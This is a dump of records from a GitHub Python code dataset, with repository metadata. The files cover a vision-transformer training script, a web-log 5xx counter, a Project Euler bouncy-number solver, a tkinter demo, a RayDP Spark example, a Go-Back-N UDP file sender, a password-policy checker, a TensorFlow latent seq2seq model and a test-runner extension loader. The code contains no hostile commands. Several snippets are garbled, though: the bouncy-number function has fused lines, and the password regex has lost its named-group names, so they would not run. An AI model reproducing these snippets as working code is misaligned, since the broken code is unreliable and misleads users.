Sometimes(HorizontalFlip(image_in=\"x\", image_out=\"x\", mode=\"train\")),\n CoarseDropout(inputs=\"x\", outputs=\"x\", mode=\"train\", max_holes=1)\n ])\n _, model = fe.build(\n model_fn=lambda: vision_transformer(num_class=10,\n weights_path=weights_path,\n image_size=(32, 32, 3),\n patch_size=4,\n num_layers=6,\n em_dim=256,\n num_heads=8,\n dff=512),\n optimizer_fn=[None, lambda: tf.optimizers.SGD(0.01, momentum=0.9)])\n network = fe.Network(ops=[\n ModelOp(model=model, inputs=\"x\", outputs=\"y_pred\"),\n CrossEntropy(inputs=(\"y_pred\", \"y\"), outputs=\"ce\", from_logits=True),\n UpdateOp(model=model, loss_name=\"ce\")\n ])\n traces = [\n Accuracy(true_key=\"y\", pred_key=\"y_pred\"),\n BestModelSaver(model=model, save_dir=model_dir, metric=\"accuracy\", save_best_mode=\"max\")\n ]\n estimator = fe.Estimator(pipeline=pipeline,\n network=network,\n epochs=epochs,\n traces=traces,\n train_steps_per_epoch=train_steps_per_epoch,\n eval_steps_per_epoch=eval_steps_per_epoch)\n estimator.fit(warmup=False)\n\n\ndef fastestimator_run(batch_size=128,\n pretrain_epochs=100,\n finetune_epochs=1,\n train_steps_per_epoch=None,\n eval_steps_per_epoch=None):\n weights_path = pretrain(batch_size=batch_size,\n epochs=pretrain_epochs,\n train_steps_per_epoch=train_steps_per_epoch,\n eval_steps_per_epoch=eval_steps_per_epoch)\n finetune(weights_path,\n batch_size=batch_size,\n epochs=finetune_epochs,\n train_steps_per_epoch=train_steps_per_epoch,\n eval_steps_per_epoch=eval_steps_per_epoch)\n\n\nif __name__ == \"__main__\":\n fastestimator_run()\n","repo_name":"fastestimator/fastestimator","sub_path":"apphub/image_classification/vit/vit_tf.py","file_name":"vit_tf.py","file_ext":"py","file_size_in_byte":10952,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"31"} +{"seq_id":"14473655881","text":"from collections import Counter\nimport argparse\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--json', action='store_true')\nargs = parser.parse_args()\n\nprint(\"Топ 5 пользователей по количеству запросов, которые завершились серверной (5ХХ) ошибкой\")\npath = input(\"Введите путь к файлу: \")\n\nwith open(path, 'r', encoding='utf-8') as log_file:\n log_file = log_file.readlines()\n result_list = []\n for row in log_file:\n splitted_row = row.split()\n if str(splitted_row[8]).startswith('5'):\n result_list.append(splitted_row[0])\n\nresult_list = dict(Counter(result_list))\nresult_list = sorted(result_list.items(), key=lambda item: item[1], reverse=True)\n\nif args.json:\n result_file_name = 'ip_requests_with_status_code_5xx.json'\n dict = {id: None for id in range(1, 6)}\n with open(result_file_name, 'w', encoding='utf-8') as result_file:\n for i in range(1, 6):\n dict_with_data = {\n 'ip': result_list[i][0],\n 'amount': str(result_list[i][1])\n }\n dict[i] = dict_with_data\n json = json.dumps(dict)\n result_file.write(json)\nelse:\n result_file_name = 'ip_requests_with_status_code_5xx.txt'\n with open(result_file_name, 'w', encoding='utf-8') as result_file:\n for i in range(5):\n row = 'ip: ' + result_list[i][0] + ' amount ' + str(result_list[i][1]) + '\\n'\n result_file.write(row)\n\nprint('Успешно, результат сохранен в файле: ' + result_file_name)\n\n","repo_name":"VK-Education-QA-Python/2022-2-VK-QA-PYTHON-Hoprosx","sub_path":"homework5/5/fifth_python.py","file_name":"fifth_python.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22017236502","text":"def bouncy(n):\r\n s = str(n)\r\n inc,dec = False, False\r\n for i in range(1,len(s)):\r\n if s[i-1]>s[i]:\r\n if(dec): return True\r\n inc = True\r\n elif s[i-1]=0.99):\r\n print('result',i)\r\n break\r\nprint('time', time.time()-t0)\r\n","repo_name":"advincze/projecteuler","sub_path":"pe112/pe112.py","file_name":"pe112.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16082639032","text":"import tkinter\n\nwindow = tkinter.Tk()\n\ndef my_text():\n tkinter.Label(window,text=\"Hi , coming form your click!\").pack(side=\"bottom\")\n\ntkinter.Button(window,text =\"Click Me\",command=my_text).pack(side=\"top\")\n\nwindow.mainloop()","repo_name":"devanujpatel/python_learning","sub_path":"Tkinter/click me to show text.py","file_name":"click me to show text.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"4977140889","text":"import numpy as np\n\nfrom da_datafix.fix import fix_lastknown\n\n\ndef test_last_known():\n vec = np.array([0, 1, 2, 3, np.nan, np.nan, 6, 7, 8, np.nan])\n fix_lastknown(vec)\n assert vec[5] == 3\n assert vec[9] == 8\n\n\ndef test_last_known_nanstart():\n vec = np.array([np.nan, 1, 2, 3, np.nan, np.nan, 6, 7, 8, np.nan])\n fix_lastknown(vec)\n assert np.isnan(vec[0])\n","repo_name":"vihman/da_datafix","sub_path":"test/test_fix.py","file_name":"test_fix.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28487009127","text":"import ray\nimport raydp\n\nray.init(address=\"auto\")\n\nconfigs={\n \"spark.driver.extraJavaOptions\": \"--add-opens=java.base/sun.nio.ch=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED\"\n}\n\nspark = raydp.init_spark(\n app_name = \"example\",\n num_executors = 1,\n executor_cores = 8,\n executor_memory = \"1GB\",\n configs = configs\n)\n\ndf_from_csv = spark.read.option('delimiter', ',') \\\n .option('header', True) \\\n .csv('./data/train/part-algo-1-womens_clothing_ecommerce_reviews.csv')\n\nprint(df_from_csv)\n\ndf_from_csv.groupBy(\"sentiment\").count().show()\n","repo_name":"data-science-on-aws/data-science-on-aws","sub_path":"wip/ray/datasets/csv-spark.py","file_name":"csv-spark.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":3220,"dataset":"github-code","pt":"31"} +{"seq_id":"70071281048","text":"from socket import *\nimport time\nimport gestorPaquetes\nimport select\nimport sender\n\nclass GoBackN(sender.Sender):\n def __init__(self,server_ip,server_port,filename,filepath,logger):\n self.sender_socekt = socket(AF_INET,SOCK_DGRAM)\n self.sender_socekt.setblocking(False)\n self.receiver_ip = server_ip\n self.receiver_port = server_port\n self.gestorPaquetes = gestorPaquetes.Gestor_Paquete()\n self.older_seq_number = 1\n self.new_seq_number = 0\n self.paquetesEnVuelo = []\n self.filePath = filepath\n self.fileName = filename\n self.logger = logger\n self.MSJ_SIZE = 2000\n self.MAX_TRIES = 3\n self.MAX_WAIT = 10\n self.MAX_WAIT_GOBACKN = 5\n self.TAM_VENTANA = 150\n self.UPLOAD = 2\n self.CARACTER_SEPARADOR = \"-\"\n\n def recibirPaqueteACK(self) :\n pckRecibido = self.recibirPaqueteBackN()\n ackRecibido = self.gestorPaquetes.actualizarACK(pckRecibido)\n return pckRecibido, ackRecibido\n \n\n def recibirPaqueteBackN(self):\n lista_sockets_listos = select.select([self.sender_socekt], [], [], 0)\n if not lista_sockets_listos[0]:\n return None\n paqueteString, sourceAddress = self.sender_socekt.recvfrom(2048)\n \n return self.gestorPaquetes.pasarBytesAPaquete(paqueteString)\n\n\n def enviarPaquetes(self,file):\n mensaje = \"entrar en ciclo\"\n timeout_start = 0\n cantidad_intentos = 0\n self.logger.debug(\"A punto de comenzar el loop par enviar paquetes en Go Back N...\")\n \n while (True):\n self.logger.debug(f\"La ventana va de {self.older_seq_number} a {self.older_seq_number + self.TAM_VENTANA} y el sequence number actual es {self.new_seq_number}\")\n if(self.new_seq_number < self.older_seq_number + self.TAM_VENTANA):\n mensaje = file.read(self.MSJ_SIZE)\n if(len(mensaje) != 0):\n pck = self.gestorPaquetes.crearPaquete(mensaje)\n self.paquetesEnVuelo.append(pck)\n \n self.sender_socekt.sendto(self.gestorPaquetes.pasarPaqueteABytes(pck),(self.receiver_ip,self.receiver_port))\n self.new_seq_number = pck.obtenerSeqNumber()\n if(self.older_seq_number == self.new_seq_number):\n self.logger.debug(\"✓ Se reinicia el timer\")\n timeout_start = time.time() \n continue\n pckRecibido, esACKEsperado = self.recibirPaqueteACK()\n if (esACKEsperado) :\n self.logger.debug(\"✓ Se recibió ACK esperado\")\n cant_paquetes_a_popear = pckRecibido.obtenerSeqNumber() - self.older_seq_number \n self.older_seq_number = pckRecibido.obtenerSeqNumber()+1\n for i in range(cant_paquetes_a_popear + 1 ): \n pck = self.paquetesEnVuelo.pop(0) \n if(self.older_seq_number == self.new_seq_number):\n break\n else: \n cantidad_intentos = 0 \n timeout_start = time.time()\n if(cantidad_intentos >= self.MAX_TRIES):\n break\n var = time.time()\n saltoTimerReenvio = (var - timeout_start) >= self.MAX_WAIT_GOBACKN\n if(saltoTimerReenvio and timeout_start != 0):\n cantidad_intentos +=1\n timeout_start = time.time()\n for pck in self.paquetesEnVuelo:\n self.sender_socekt.sendto(self.gestorPaquetes.pasarPaqueteABytes(pck),(self.receiver_ip,self.receiver_port))\n conexion_cerrada, pck_recibido = self.enviar_fin()\n if(conexion_cerrada == True):\n self.logger.info(\"✓ Se han enviado todos los paquetes con Go Back N y se ha cerrado la conexion con exito\")\n return\n\n\n\n \n\n\n\n","repo_name":"ldiazcto/Intro-a-Sistemas-Distribuidos-TP1","sub_path":"lib/sender_gobackn.py","file_name":"sender_gobackn.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9650445703","text":"import sys\nimport re\n\ndef main():\n pw_re = re.compile(r'^(?P\\d+)-(?P\\d+) (?P\\w): (?P\\w+)$')\n ans = 0\n for line in sys.stdin:\n match = pw_re.search(line)\n assert(match)\n\n gd = match.groupdict()\n cnt = gd['s'].count(gd['c'])\n if cnt >= int(gd['lo']) and cnt <= int(gd['hi']):\n ans += 1\n\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"soobeenpark/scratchwork","sub_path":"advent_of_code/02_pt1.py","file_name":"02_pt1.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40436347072","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport random\n\nimport numpy as np\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\nfrom tensorflow.python.ops import variable_scope\n\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import control_flow_ops\nfrom tensorflow.python.ops import embedding_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import rnn\nfrom tensorflow.python.ops import rnn_cell\nfrom tensorflow.python.ops import variable_scope\n\nfrom tensorflow.models.rnn.translate import data_utils\nimport seq2seq\nimport env\n\n\ndef compute_post_Q_L(log_p_y_gv_z_x, log_p_z_gv_x, previous_post_z, num_z):\n \"\"\" Compute P(z|x,y), Q and L given logP(z|x) and logP(y|z,x)\n \n Args:\n log_p_y_gv_z_x: logP(y|z,x), of shape [batch_size * num_z]\n log_p_z_gv_x: logP(z|x), of shape [batch_size * num_z]\n \"\"\"\n \n withDummy = env.config.getboolean(\"model\",'withDummy')\n\n if withDummy: \n log_p_z_gv_x = array_ops.reshape(log_p_z_gv_x,[-1, num_z - 1])\n zero = tf.zeros([tf.shape(log_p_z_gv_x)[0],1],tf.float32)\n log_p_z_gv_x = tf.concat(1, [zero, log_p_z_gv_x])\n log_p_z_gv_x = array_ops.reshape(log_p_z_gv_x,[-1])\n\n log_p_y_z_gv_x = log_p_y_gv_z_x + log_p_z_gv_x\n log_p_y_z_gv_x_reshape = array_ops.reshape(log_p_y_z_gv_x, [-1, num_z])\n\n\n # if withDummy, the unlabled L and Q and post_z is not correct, but we still can predict using post_z;\n\n # unlabeled L\n uL = math_ops.reduce_sum(tf.log(math_ops.reduce_sum(tf.exp(log_p_y_z_gv_x_reshape), 1)))\n\n post_z = tf.nn.softmax(log_p_y_z_gv_x_reshape)\n post_z = array_ops.reshape(post_z,[-1])\n\n # unlabeled Q\n post_z_copy = tf.stop_gradient(post_z)\n uQ = math_ops.reduce_sum(log_p_y_z_gv_x * post_z_copy)\n\n \n\n\n # labeled Q\n lQ = math_ops.reduce_sum(log_p_y_z_gv_x * previous_post_z)\n \n # labeled L\n lL = lQ\n\n return post_z, uL, uQ, lL, lQ\n\ndef compute_post_Q_L_avg(log_p_y_gv_z_x, log_p_z_gv_x, previous_post_z, num_z):\n \"\"\" Compute P(z|x,y), Q and L given logP(z|x) and logP(y|z,x)\n \n Args:\n log_p_y_gv_z_x: logP(y|z,x), of shape [batch_size * num_z]\n log_p_z_gv_x: logP(z|x), of shape [batch_size * num_z]\n \"\"\"\n\n withDummy = env.config.getboolean(\"model\",'withDummy')\n if withDummy: \n log_p_z_uniform = tf.constant(np.log(1.0/(num_z-1)), shape=log_p_z_gv_x.get_shape(), dtype=log_p_z_gv_x.dtype)\n log_p_y_z_gv_x = log_p_y_gv_z_x + log_p_z_uniform\n zero = tf.constant([tf.shape(log_p_z_gv_x),1])\n log_p_z_gv_x = tf.concat(1, [zero, log_p_z_gv_x])\n else:\n log_p_z_uniform = tf.constant(np.log(1.0/num_z), shape=log_p_z_gv_x.get_shape(), dtype=log_p_z_gv_x.dtype)\n log_p_y_z_gv_x = log_p_y_gv_z_x + log_p_z_uniform\n\n log_p_y_z_gv_x_reshape = array_ops.reshape(log_p_y_z_gv_x, [-1, num_z])\n\n # unlabeled L\n uL = math_ops.reduce_sum(tf.log(math_ops.reduce_sum(tf.exp(log_p_y_z_gv_x_reshape), 1)))\n\n post_z = tf.nn.softmax(log_p_y_z_gv_x_reshape)\n post_z = array_ops.reshape(post_z,[-1])\n # unlabeled Q\n post_z_copy = tf.stop_gradient(post_z)\n uQ = math_ops.reduce_sum(log_p_y_z_gv_x * post_z_copy)\n\n # labeled Q\n lQ = math_ops.reduce_sum(log_p_y_z_gv_x * previous_post_z)\n \n # labeled L\n lL = lQ\n\n return post_z, uL, uQ, lL, lQ\n\n\n\n\nclass Seq2SeqModel(object):\n \"\"\"Sequence-to-sequence model with attention and for multiple buckets.\n\n This class implements a multi-layer recurrent neural network as encoder,\n and an attention-based decoder. This is the same as the model described in\n this paper: http://arxiv.org/abs/1412.7449 - please look there for details,\n or into the seq2seq library for complete model implementation.\n This class also allows to use GRU cells in addition to LSTM cells, and\n sampled softmax to handle large output vocabulary size. A single-layer\n version of this model, but with bi-directional encoder, was presented in\n http://arxiv.org/abs/1409.0473\n and sampled softmax is described in Section 3 of the following paper.\n http://arxiv.org/abs/1412.2007\n \"\"\"\n\n def __init__(self,\n source_vocab_size,\n target_vocab_size,\n num_z, \n buckets,\n size,\n num_layers,\n max_gradient_norm,\n batch_size,\n learning_rate,\n learning_rate_decay_factor,\n use_lstm=False,\n num_samples=512,\n forward_only=False,\n dtype=tf.float32):\n \"\"\"Create the model.\n \n Args:\n source_vocab_size: size of the source vocabulary.\n target_vocab_size: size of the target vocabulary.\n num_z: size of the hidden states.\n buckets: a list of pairs (I, O), where I specifies maximum input length\n that will be processed in that bucket, and O specifies maximum output\n length. Training instances that have inputs longer than I or outputs\n longer than O will be pushed to the next bucket and padded accordingly.\n We assume that the list is sorted, e.g., [(2, 4), (8, 16)].\n size: number of units in each layer of the model.\n num_layers: number of layers in the model.\n max_gradient_norm: gradients will be clipped to maximally this norm.\n batch_size: the size of the batches used during training;\n the model construction is independent of batch_size, so it can be\n changed after initialization if this is convenient, e.g., for decoding.\n batch_size % num_z = 0\n learning_rate: learning rate to start with.\n learning_rate_decay_factor: decay learning rate by this much when needed.\n use_lstm: if true, we use LSTM cells instead of GRU cells.\n num_samples: number of samples for sampled softmax.\n forward_only: if set, we do not construct the backward pass in the model.\n dtype: the data type to use to store internal variables.\n \"\"\"\n\n withCompact = env.config.getboolean(\"model\",'withCompact')\n \n self.source_vocab_size = source_vocab_size\n self.target_vocab_size = target_vocab_size\n self.num_z = num_z\n self.buckets = buckets\n self.real_batch_size = batch_size\n \n\n if withCompact:\n self.batch_size = self.real_batch_size\n else:\n self.batch_size = self.real_batch_size * self.num_z\n \n dropoutRateRaw = env.config.getfloat(\"model\",\"dropoutRate\")\n self.dropoutRate = tf.Variable(\n float(dropoutRateRaw), trainable=False, dtype=dtype)\n\n self.learning_rate = tf.Variable(\n float(learning_rate), trainable=False, dtype=dtype)\n self.learning_rate_decay_op = self.learning_rate.assign(\n self.learning_rate * learning_rate_decay_factor)\n self.global_step = tf.Variable(0, trainable=False)\n\n # create np_hidden_input\n self.np_hidden_input_1212 = np.array(range(self.num_z) * int(self.real_batch_size))\n self.hidden_input_1212 = tf.constant(self.np_hidden_input_1212)\n\n\n temp = []\n for i in xrange(self.real_batch_size):\n for j in xrange(self.num_z):\n temp.append(i)\n self.np_hidden_input_1122 = np.array(temp)\n self.hidden_input_1122 = tf.constant(self.np_hidden_input_1122)\n \n \n\n \n\n # If we use sampled softmax, we need an output projection.\n output_projection = None\n softmax_loss_function = None\n\n # Create the internal multi-layer cell for our RNN.\n withLSTM = env.config.getboolean('model','withLSTM')\n if withLSTM:\n single_cell = tf.nn.rnn_cell.LSTMCell(size, state_is_tuple=True)\n else:\n single_cell = tf.nn.rnn_cell.GRUCell(size)\n \n if use_lstm:\n single_cell = tf.nn.rnn_cell.BasicLSTMCell(size)\n cell = single_cell\n if num_layers > 1:\n cell = tf.nn.rnn_cell.MultiRNNCell([single_cell] * num_layers)\n\n K = env.config.getint('model','K')\n \n\n # The seq2seq function: we use embedding for the input and attention.\n def seq2seq_f(encoder_inputs, decoder_inputs, do_decode):\n return seq2seq.embedding_rnn_seq2seq_latent(\n encoder_inputs,\n decoder_inputs,\n self.hidden_input_1212,\n self.hidden_input_1122,\n cell,\n num_encoder_symbols=source_vocab_size,\n num_decoder_symbols=target_vocab_size,\n num_z = self.num_z,\n embedding_size=K,\n output_projection=output_projection,\n feed_previous=do_decode,\n dtype=dtype,\n dropoutRate = self.dropoutRate)\n \n # Feeds for inputs.\n self.encoder_inputs = []\n self.decoder_inputs = []\n self.target_weights = []\n for i in xrange(buckets[-1][0]): # Last bucket is the biggest one.\n self.encoder_inputs.append(tf.placeholder(tf.int32, shape=[self.batch_size],\n name=\"encoder{0}\".format(i)))\n for i in xrange(buckets[-1][1] + 1):\n self.decoder_inputs.append(tf.placeholder(tf.int32, shape=[self.batch_size],\n name=\"decoder{0}\".format(i)))\n \n self.target_weights.append(tf.placeholder(dtype, shape=[self.batch_size],\n name=\"weight{0}\".format(i)))\n\n if withCompact:\n self.previous_post_z = tf.placeholder(tf.float32, shape = [self.batch_size * self.num_z], name = \"previous_post_z\")\n else:\n self.previous_post_z = tf.placeholder(tf.float32, shape = [self.batch_size], name = \"previous_post_z\")\n \n # Our targets are decoder inputs shifted by one.\n self.targets = [self.decoder_inputs[i + 1]\n for i in xrange(len(self.decoder_inputs) - 1)]\n\n\n if withCompact:\n # expand target_weight and targets\n temp_targets = []\n for target in self.targets:\n target_expand = embedding_ops.embedding_lookup(target,self.hidden_input_1122)\n temp_targets.append(target_expand)\n\n temp_target_weights = []\n for target_weight in self.target_weights:\n target_weight_expand = embedding_ops.embedding_lookup(target_weight,self.hidden_input_1122)\n temp_target_weights.append(target_weight_expand)\n\n # Training outputs and losses. \n self.outputs, self.losses, self.log_p_zs = seq2seq.model_with_buckets_latent(self.encoder_inputs, self.decoder_inputs, temp_targets, temp_target_weights, buckets, lambda x, y: seq2seq_f(x, y, False),softmax_loss_function=softmax_loss_function, per_example_loss = True)\n\n else:\n # Training outputs and losses.\n self.outputs, self.losses, self.log_p_zs = seq2seq.model_with_buckets_latent(self.encoder_inputs, self.decoder_inputs, self.targets, self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, False),softmax_loss_function=softmax_loss_function, per_example_loss = True)\n\n # for post_z, Q and L \n self.post_zs = []\n self.uQs = []\n self.uLs = []\n self.lQs = []\n self.lLs = []\n self.log_p_y_gv_zs = []\n for i in xrange(len(self.outputs)):\n #output = self.outputs[i]\n loss = self.losses[i]\n log_p_y_gv_z = -loss #[real_batch_size * num_z]\n log_p_z = self.log_p_zs[i]\n self.log_p_y_gv_zs.append(log_p_y_gv_z)\n\n if env.config.getboolean(\"model\",\"withpz\"):\n cpql = compute_post_Q_L\n else:\n cpql = compute_post_Q_L_avg\n \n post_z,uL,uQ,lL,lQ = cpql(log_p_y_gv_z, log_p_z, self.previous_post_z, self.num_z)\n self.post_zs.append(post_z)\n self.uQs.append(uQ)\n self.uLs.append(uL)\n self.lQs.append(lQ) \n self.lLs.append(lL)\n\n # Gradients and SGD update operation for training the model.\n params = tf.trainable_variables()\n if not forward_only:\n self.gradient_norms_u = []\n self.updates_u = []\n self.gradient_norms_l = []\n self.updates_l = []\n if env.config.getboolean(\"model\",\"withAdagrad\"):\n opt = tf.train.AdagradOptimizer(self.learning_rate)\n else:\n opt = tf.train.GradientDescentOptimizer(self.learning_rate)\n\n for b in xrange(len(buckets)):\n gradients = tf.gradients(-self.uQs[b], params)\n clipped_gradients, norm = tf.clip_by_global_norm(gradients,\n max_gradient_norm)\n self.gradient_norms_u.append(norm)\n self.updates_u.append(opt.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step))\n \n \n for b in xrange(len(buckets)):\n gradients = tf.gradients(-self.lQs[b], params)\n clipped_gradients, norm = tf.clip_by_global_norm(gradients,\n max_gradient_norm)\n self.gradient_norms_l.append(norm)\n self.updates_l.append(opt.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step))\n\n self.saver = tf.train.Saver(tf.all_variables())\n\n\n def batch_step(self, session, encoder_inputs, decoder_inputs, target_weights, bucket_id, labeled = False, true_hidden_inputs = None, forward_only = False, fetch_more = False):\n '''\n EM step for labeled data and unlabeled data\n '''\n\n # Check if the sizes match.\n encoder_size, decoder_size = self.buckets[bucket_id]\n if len(encoder_inputs) != encoder_size:\n raise ValueError(\"Encoder length must be equal to the one in bucket,\"\" %d != %d.\" % (len(encoder_inputs), encoder_size))\n if len(decoder_inputs) != decoder_size:\n raise ValueError(\"Decoder length must be equal to the one in bucket,\"\" %d != %d.\" % (len(decoder_inputs), decoder_size))\n if len(target_weights) != decoder_size:\n raise ValueError(\"Weights length must be equal to the one in bucket,\"\" %d != %d.\" % (len(target_weights), decoder_size))\n \n # Input feed: encoder inputs, decoder inputs, target_weights, as provided.\n input_feed = {}\n for l in xrange(encoder_size):\n input_feed[self.encoder_inputs[l].name] = encoder_inputs[l]\n for l in xrange(decoder_size):\n input_feed[self.decoder_inputs[l].name] = decoder_inputs[l]\n input_feed[self.target_weights[l].name] = target_weights[l]\n\n # Since our targets are decoder inputs shifted by one, we need one more.\n last_target = self.decoder_inputs[decoder_size].name\n input_feed[last_target] = np.zeros([self.batch_size], dtype=np.int32)\n \n withCompact = env.config.getboolean(\"model\",'withCompact')\n withBalance = env.config.getboolean(\"model\",'withBalance')\n \n # for previous_post_z\n if labeled:\n if withCompact:\n post_z = np.zeros((len(true_hidden_inputs)*self.num_z,))\n vals = [1.0,1.0,2.0,3.57,10.1]\n for i in xrange(0,len(true_hidden_inputs)):\n if withBalance:\n val = vals[true_hidden_inputs[i][0]]\n else:\n val = 1.0\n j = i * self.num_z + true_hidden_inputs[i][0]\n post_z[j] = val \n else:\n post_z = np.zeros((len(true_hidden_inputs),))\n for i in xrange(0,len(true_hidden_inputs)):\n post_z[i] = 1.0 if i % self.num_z == true_hidden_inputs[i][0] else 0.0 \n input_feed[self.previous_post_z.name] = post_z\n\n # Output feed: depends on whether we do a backward step or not.\n\n if labeled:\n output_feed = [self.lQs[bucket_id], self.lLs[bucket_id]]\n else:\n output_feed = [self.uQs[bucket_id], self.uLs[bucket_id]]\n\n if not forward_only:\n if labeled:\n output_feed = [self.updates_l[bucket_id], self.gradient_norms_l[bucket_id] ] + output_feed\n else:\n output_feed = [self.updates_u[bucket_id], self.gradient_norms_u[bucket_id] ] + output_feed\n if fetch_more:\n output_feed += [ self.log_p_zs[bucket_id], self.log_p_y_gv_zs[bucket_id], self.post_zs[bucket_id]]\n \n outputs = session.run(output_feed, input_feed)\n \n log_p_z, log_p_y_gv_z, post_z, norm, L, Q = None, None, None, None, None, None\n \n if forward_only:\n Q = outputs[0]\n L = outputs[1]\n else:\n norm = outputs[1]\n Q = outputs[2]\n L = outputs[3]\n if fetch_more:\n log_p_z = outputs[-3]\n log_p_y_gv_z = outputs[-2]\n post_z = outputs[-1]\n \n return log_p_z, log_p_y_gv_z, post_z, L, norm, Q\n\n \n\n def get_batch(self, data, bucket_id, start_id = None, num_z = 1):\n \"\"\"Get a random batch of data from the specified bucket, prepare for step.\n\n To feed data in step(..) it must be a list of batch-major vectors, while\n data here contains single length-major cases. So the main logic of this\n function is to re-index data cases to be in the proper format for feeding.\n\n Args:\n data: a tuple of size len(self.buckets) in which each element contains\n lists of pairs of input and output data that we use to create a batch.\n bucket_id: integer, which bucket to get the batch for.\n start_id: if not None, creat the batch start from a certain index.\n\n Returns:\n The triple (encoder_inputs, decoder_inputs, target_weights, hiddens) for\n the constructed batch that has the proper format to call step(...) later.\n \"\"\"\n encoder_size, decoder_size = self.buckets[bucket_id]\n encoder_inputs, decoder_inputs, zs = [], [], []\n\n # check start_id\n if start_id != None and start_id + self.real_batch_size > len(data[bucket_id]):\n return None, None, None, None\n\n # Get a random batch of encoder and decoder inputs from data,\n # pad them if needed, reverse encoder inputs and add GO to decoder.\n withReverse = env.config.getboolean(\"model\",\"withReverse\")\n\n for i in xrange(self.real_batch_size):\n if start_id == None:\n encoder_input, decoder_input, z = random.choice(data[bucket_id])\n else:\n encoder_input, decoder_input, z = data[bucket_id][start_id + i]\n\n # Encoder inputs are padded and then reversed.\n encoder_pad = [data_utils.PAD_ID] * (encoder_size - len(encoder_input))\n if withReverse:\n encoder_inputs.append(list(reversed(encoder_input + encoder_pad)))\n else:\n encoder_inputs.append(list(encoder_pad + encoder_input))\n \n\n # Decoder inputs get an extra \"GO\" symbol, and are padded then.\n decoder_pad_size = decoder_size - len(decoder_input) - 1\n decoder_inputs.append([data_utils.GO_ID] + decoder_input +\n [data_utils.PAD_ID] * decoder_pad_size)\n zs.append(z)\n\n # Now we create batch-major vectors from the data selected above.\n batch_encoder_inputs, batch_decoder_inputs, batch_weights = [], [], []\n\n # Batch encoder inputs are just re-indexed encoder_inputs.\n for length_idx in xrange(encoder_size):\n batch_encoder_inputs.append(\n np.array([encoder_inputs[batch_idx][length_idx]\n for batch_idx in xrange(self.real_batch_size)], dtype=np.int32))\n\n # Batch decoder inputs are re-indexed decoder_inputs, we create weights.\n for length_idx in xrange(decoder_size):\n batch_decoder_inputs.append(\n np.array([decoder_inputs[batch_idx][length_idx]\n for batch_idx in xrange(self.real_batch_size)], dtype=np.int32))\n\n # Create target_weights to be 0 for targets that are padding.\n batch_weight = np.ones(self.real_batch_size, dtype=np.float32)\n for batch_idx in xrange(self.real_batch_size):\n # We set weight to 0 if the corresponding target is a PAD symbol.\n # The corresponding target is decoder_input shifted by 1 forward.\n if length_idx < decoder_size - 1:\n target = decoder_inputs[batch_idx][length_idx + 1]\n if length_idx == decoder_size - 1 or target == data_utils.PAD_ID:\n batch_weight[batch_idx] = 0.0\n batch_weights.append(batch_weight)\n\n def expand_n(arr,n):\n if len(arr.shape) == 1:\n expand = np.zeros((arr.shape[0] * n,))\n else:\n expand = np.zeros((arr.shape[0] * n, arr.shape[1]))\n\n for i in xrange(arr.shape[0]):\n for j in xrange(n):\n expand[i * n + j] = arr[i]\n return expand\n\n\n withCompact = env.config.getboolean(\"model\",\"withCompact\")\n\n # expand num_z \n if not withCompact:\n for l in xrange(encoder_size):\n batch_encoder_inputs[l] = expand_n(batch_encoder_inputs[l],num_z)\n for l in xrange(decoder_size):\n batch_decoder_inputs[l] = expand_n(batch_decoder_inputs[l],num_z)\n batch_weights[l] = expand_n(batch_weights[l],num_z)\n zs = expand_n(np.array(zs), num_z)\n\n return batch_encoder_inputs, batch_decoder_inputs, batch_weights, zs\n","repo_name":"shixing/discourse","sub_path":"py/seq2seq_model_latent.py","file_name":"seq2seq_model_latent.py","file_ext":"py","file_size_in_byte":22337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18111560765","text":"import importlib.util\nimport os\n\nfrom pathlib import Path\nfrom typing import Callable, Iterable, List, Sequence, Tuple, Type\n\nfrom trunner.target import TargetBase\nfrom trunner.host import Host\n\n\nclass ExtensionError(Exception):\n pass\n\n\ndef read_extensions_paths() -> List[Path]:\n \"\"\"Returns the list of extension file paths found in directories specified in PHOENIX_TRUNNER_EXT env variable.\"\"\"\n\n paths = os.getenv(\"PHOENIX_TRUNNER_EXT\")\n if not paths:\n return []\n\n result = []\n\n for pstr in paths.split(os.pathsep):\n p = Path(pstr)\n if not p.is_dir():\n raise ExtensionError(f\"Extension path {p} must be a dir!\")\n\n result.extend(p.glob(\"**/*_ext.py\"))\n\n return result\n\n\ndef load_register_fn(path: Path):\n \"\"\"Loads and returns the register_extension function defined in python file in path argument.\"\"\"\n\n spec = importlib.util.spec_from_file_location(path.name, path.absolute())\n if not spec:\n raise ExtensionError(f\"Failed to load spec from location {path}\")\n\n extension_module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(extension_module)\n\n if not hasattr(extension_module, \"register_extension\"):\n raise ExtensionError(f\"Extension at {path} doesn't define register_extension 